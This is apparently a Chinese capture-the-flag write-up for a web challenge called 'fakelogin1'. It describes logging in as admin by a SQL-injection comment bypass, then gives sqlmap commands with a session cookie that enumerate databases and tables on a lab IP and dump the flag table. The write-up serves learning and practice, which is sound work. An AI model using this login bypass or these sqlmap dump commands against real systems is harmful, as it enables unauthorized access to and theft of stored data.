[Web]fakelogin1 xp0int Posted on Oct 28 2018 (比赛题目可能有改动,做法没变) 首先一个登陆页面  猜用户: admin 用’#尝试绕过  或直接绕过:  都能登陆。  登陆后跳转到sqldebug.php,有uid参数。 简单测试:   使用sqlmap(用自己的cookie): sqlmap -u 'http://192.168.44.128/sqldebug.php?uid=1' --cookie='PHPSESSID=xxxxxxxxxx' –dbs  sqlmap -u 'http://192.168.44.128/sqldebug.php?uid=1' --cookie='PHPSESSID=xxxxxxxxxx' -D fakelogin1 –tables  sqlmap -u 'http://192.168.44.128/sqldebug.php?uid=1' --cookie='PHPSESSID=xxxxxxxxxx' -D fakelogin1 -T fffflllaaaaagggggg369 –dump  打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Web]easy web [Misc]bitcoin_base
没有帐号? 立即注册